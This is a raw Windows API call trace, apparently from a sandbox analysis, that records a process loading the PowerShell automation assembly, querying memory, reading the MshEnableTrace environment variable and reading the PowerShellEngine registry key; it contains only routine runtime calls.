	[0309.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0309.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0310.278] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.278] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0310.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.278] CoTaskMemFree (pv=0x3a6ee0) 
	[0310.279] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.284] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0310.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.284] CoTaskMemFree (pv=0x3a6ee0) 
	[0310.285] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0310.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.285] CoTaskMemFree (pv=0x3a6ee0) 
	[0310.285] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0310.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.285] CoTaskMemFree (pv=0x3a6ee0) 
	[0310.287] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0310.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.287] CoTaskMemFree (pv=0x3a6ee0) 
	[0310.288] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0310.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.288] CoTaskMemFree (pv=0x3a6ee0) 
	[0310.289] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0310.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.289] CoTaskMemFree (pv=0x3a6ee0) 
	[0310.290] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.291] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.920] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0310.923] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0310.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.923] CoTaskMemFree (pv=0x3a6ee0) 
	[0312.053] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3a7320
	[0312.054] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3a7430
	[0315.634] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.079] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.081] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.082] VirtualQuery (in: lpAddress=0x12a0a0, lpBuffer=0x12af60, dwLength=0x30 | out: lpBuffer=0x12af60*(BaseAddress=0x12a000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.502] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.503] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.504] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.505] VirtualQuery (in: lpAddress=0x12b650, lpBuffer=0x12c510, dwLength=0x30 | out: lpBuffer=0x12c510*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.506] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.506] CoTaskMemFree (pv=0x3a7540) 
	[0316.517] CoTaskMemAlloc (cb=0x104) returned 0x3a7540
	[0316.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7540, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0316.517] CoTaskMemFree (pv=0x3a7540) 
	[0316.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.852] VirtualQuery (in: lpAddress=0x12b900, lpBuffer=0x12c7c0, dwLength=0x30 | out: lpBuffer=0x12c7c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0316.853] VirtualQuery (in: lpAddress=0x12b900, lpBuffer=0x12c7c0, dwLength=0x30 | out: lpBuffer=0x12c7c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.853] VirtualQuery (in: lpAddress=0x12b150, lpBuffer=0x12c010, dwLength=0x30 | out: lpBuffer=0x12c010*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.854] VirtualQuery (in: lpAddress=0x12b150, lpBuffer=0x12c010, dwLength=0x30 | out: lpBuffer=0x12c010*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0316.854] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d758 | out: phkResult=0x12d758*=0x2e8) returned 0x0
	[0316.854] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d6dc, lpData=0x0, lpcbData=0x12d6d8*=0x0 | out: lpType=0x12d6dc*=0x1, lpData=0x0, lpcbData=0x12d6d8*=0x56) returned 0x0
	[0316.854] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a63c0
	[0316.854] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d6ac, lpData=0x1b7a63c0, lpcbData=0x12d6a8*=0x56 | out: lpType=0x12d6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d6a8*=0x56) returned 0x0
	[0316.855] CoTaskMemFree (pv=0x1b7a63c0) 
	[0316.855] RegCloseKey (hKey=0x2e8) returned 0x0
	[0316.855] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d758 | out: phkResult=0x12d758*=0x2e8) returned 0x0
	[0316.855] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d6dc, lpData=0x0, lpcbData=0x12d6d8*=0x0 | out: lpType=0x12d6dc*=0x1, lpData=0x0, lpcbData=0x12d6d8*=0x56) returned 0x0
	[0316.855] CoTaskMemAlloc (cb=0x5a) returned 0x1b7a63c0
